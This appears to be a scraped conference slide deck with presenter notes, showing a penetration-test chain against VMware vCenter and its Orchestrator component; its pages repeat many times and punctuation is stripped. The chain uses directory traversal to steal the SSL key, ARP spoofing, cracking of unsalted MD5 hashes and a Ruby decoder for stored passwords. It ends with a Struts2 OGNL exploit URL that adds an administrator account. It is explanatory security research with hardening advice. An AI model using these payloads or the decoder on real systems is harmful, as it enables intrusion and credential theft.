It looks like hash it did not But they encoded using unknown algorithm

Password Encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079

vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random

Presenter
Presentation Notes
I encode few password and noticed that first 3 bytes is length then byte in ascii range and after some random bytes13

Algorithm password Encoding

for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +

position of symbol resultappend(toAdd)

Presenter
Presentation Notes
After searching in decompiled java code it was clear that encoding algorithm very simple It just generate 16 random bytes than take password and add to each byte its position in password

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 12: Invest in security

Attack

bull Make arp spoofing bull Spoof ssl certificate

Presenter
Presentation Notes
So we decided to try classic arp spoofing but vSphere client use ssl and we need to spoof ssl cert13

Attack

bull Administrators check SSL cert

Presenter
Presentation Notes
But it did not work because admins was clever they add cert to trusted zone and does not push ldquoIgnore buttonrdquo13

Attack

bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll

UsersApplication DataVMwareVMware VirtualCenterSSLruikey

bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work

Presenter
Presentation Notes
So we try use directory traversal which we found to steal ssl private keysThen make arp-spoofing decrypt ssl traffic using this key and stole admin session id13

Vmware vCenter Orchestrator

bull Vmware vCO ndash software for automate configuration and management

bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties

Presenter
Presentation Notes
And that worked pretty well But we wanted more What if arp spoofing does not work So we decided to look for something else 13We noticed VMware vCenter Orchestrator ndash interface for managing vCenter So we thought that it must store password from vCenter somewhere 13

bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables

GPU

Presenter
Presentation Notes
We found them in jettyetcpasswdproperties in form of md5 hash without a salt So it was not hard to bruteforce them13

We get in

Presenter
Presentation Notes
After login to vCO we noticed that it used for management of vCenter You can on slide there are some plugins on left domain controllers mail ssh and almost each plugin have password So it must stored somewhere password for vCenter Would it be cool if we can read them13

Plain text passwords

Presenter
Presentation Notes
Actuale the was in plaintext13We found out that it store password from mail account domen controllers and others in plain text 13

Vmware vCenter Orchestrator

bull vCO stored password at files bull CProgram

FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml

bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties

Presenter
Presentation Notes
We go further and find some passwords in file VCxml vmopropeties

VCxml

ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-

usernamegt ltadministrator-

passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt

ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt

Presenter
Presentation Notes
It looks like hash it did not But they encoded using unknown algorithm

Password Encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079

vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random

Presenter
Presentation Notes
I encode few password and noticed that first 3 bytes is length then byte in ascii range and after some random bytes13

Algorithm password Encoding

for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +

position of symbol resultappend(toAdd)

Presenter
Presentation Notes
After searching in decompiled java code it was clear that encoding algorithm very simple It just generate 16 random bytes than take password and add to each byte its position in password

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 13: Invest in security

Attack

bull Administrators check SSL cert

Presenter
Presentation Notes
But it did not work because admins was clever they add cert to trusted zone and does not push ldquoIgnore buttonrdquo13

Attack

bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll

UsersApplication DataVMwareVMware VirtualCenterSSLruikey

bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work

Presenter
Presentation Notes
So we try use directory traversal which we found to steal ssl private keysThen make arp-spoofing decrypt ssl traffic using this key and stole admin session id13

Vmware vCenter Orchestrator

bull Vmware vCO ndash software for automate configuration and management

bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties

Presenter
Presentation Notes
And that worked pretty well But we wanted more What if arp spoofing does not work So we decided to look for something else 13We noticed VMware vCenter Orchestrator ndash interface for managing vCenter So we thought that it must store password from vCenter somewhere 13

bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables

GPU

Presenter
Presentation Notes
We found them in jettyetcpasswdproperties in form of md5 hash without a salt So it was not hard to bruteforce them13

We get in

Presenter
Presentation Notes
After login to vCO we noticed that it used for management of vCenter You can on slide there are some plugins on left domain controllers mail ssh and almost each plugin have password So it must stored somewhere password for vCenter Would it be cool if we can read them13

Plain text passwords

Presenter
Presentation Notes
Actuale the was in plaintext13We found out that it store password from mail account domen controllers and others in plain text 13

Vmware vCenter Orchestrator

bull vCO stored password at files bull CProgram

FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml

bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties

Presenter
Presentation Notes
We go further and find some passwords in file VCxml vmopropeties

VCxml

ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-

usernamegt ltadministrator-

passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt

ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt

Presenter
Presentation Notes
It looks like hash it did not But they encoded using unknown algorithm

Password Encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079

vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random

Presenter
Presentation Notes
I encode few password and noticed that first 3 bytes is length then byte in ascii range and after some random bytes13

Algorithm password Encoding

for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +

position of symbol resultappend(toAdd)

Presenter
Presentation Notes
After searching in decompiled java code it was clear that encoding algorithm very simple It just generate 16 random bytes than take password and add to each byte its position in password

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 14: Invest in security

Attack

bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll

UsersApplication DataVMwareVMware VirtualCenterSSLruikey

bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work

Presenter
Presentation Notes
So we try use directory traversal which we found to steal ssl private keysThen make arp-spoofing decrypt ssl traffic using this key and stole admin session id13

Vmware vCenter Orchestrator

bull Vmware vCO ndash software for automate configuration and management

bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties

Presenter
Presentation Notes
And that worked pretty well But we wanted more What if arp spoofing does not work So we decided to look for something else 13We noticed VMware vCenter Orchestrator ndash interface for managing vCenter So we thought that it must store password from vCenter somewhere 13

bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables

GPU

Presenter
Presentation Notes
We found them in jettyetcpasswdproperties in form of md5 hash without a salt So it was not hard to bruteforce them13

We get in

Presenter
Presentation Notes
After login to vCO we noticed that it used for management of vCenter You can on slide there are some plugins on left domain controllers mail ssh and almost each plugin have password So it must stored somewhere password for vCenter Would it be cool if we can read them13

Plain text passwords

Presenter
Presentation Notes
Actuale the was in plaintext13We found out that it store password from mail account domen controllers and others in plain text 13

Vmware vCenter Orchestrator

bull vCO stored password at files bull CProgram

FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml

bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties

Presenter
Presentation Notes
We go further and find some passwords in file VCxml vmopropeties

VCxml

ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-

usernamegt ltadministrator-

passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt

ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt

Presenter
Presentation Notes
It looks like hash it did not But they encoded using unknown algorithm

Password Encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079

vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random

Presenter
Presentation Notes
I encode few password and noticed that first 3 bytes is length then byte in ascii range and after some random bytes13

Algorithm password Encoding

for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +

position of symbol resultappend(toAdd)

Presenter
Presentation Notes
After searching in decompiled java code it was clear that encoding algorithm very simple It just generate 16 random bytes than take password and add to each byte its position in password

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 15: Invest in security

Vmware vCenter Orchestrator

bull Vmware vCO ndash software for automate configuration and management

bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties

Presenter
Presentation Notes
And that worked pretty well But we wanted more What if arp spoofing does not work So we decided to look for something else 13We noticed VMware vCenter Orchestrator ndash interface for managing vCenter So we thought that it must store password from vCenter somewhere 13

bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables

GPU

Presenter
Presentation Notes
We found them in jettyetcpasswdproperties in form of md5 hash without a salt So it was not hard to bruteforce them13

We get in

Presenter
Presentation Notes
After login to vCO we noticed that it used for management of vCenter You can on slide there are some plugins on left domain controllers mail ssh and almost each plugin have password So it must stored somewhere password for vCenter Would it be cool if we can read them13

Plain text passwords

Presenter
Presentation Notes
Actuale the was in plaintext13We found out that it store password from mail account domen controllers and others in plain text 13

Vmware vCenter Orchestrator

bull vCO stored password at files bull CProgram

FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml

bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties

Presenter
Presentation Notes
We go further and find some passwords in file VCxml vmopropeties

VCxml

ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-

usernamegt ltadministrator-

passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt

ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt

Presenter
Presentation Notes
It looks like hash it did not But they encoded using unknown algorithm

Password Encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079

vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random

Presenter
Presentation Notes
I encode few password and noticed that first 3 bytes is length then byte in ascii range and after some random bytes13

Algorithm password Encoding

for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +

position of symbol resultappend(toAdd)

Presenter
Presentation Notes
After searching in decompiled java code it was clear that encoding algorithm very simple It just generate 16 random bytes than take password and add to each byte its position in password

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 16: Invest in security

bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables

GPU

Presenter
Presentation Notes
We found them in jettyetcpasswdproperties in form of md5 hash without a salt So it was not hard to bruteforce them13

We get in

Presenter
Presentation Notes
After login to vCO we noticed that it used for management of vCenter You can on slide there are some plugins on left domain controllers mail ssh and almost each plugin have password So it must stored somewhere password for vCenter Would it be cool if we can read them13

Plain text passwords

Presenter
Presentation Notes
Actuale the was in plaintext13We found out that it store password from mail account domen controllers and others in plain text 13

Vmware vCenter Orchestrator

bull vCO stored password at files bull CProgram

FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml

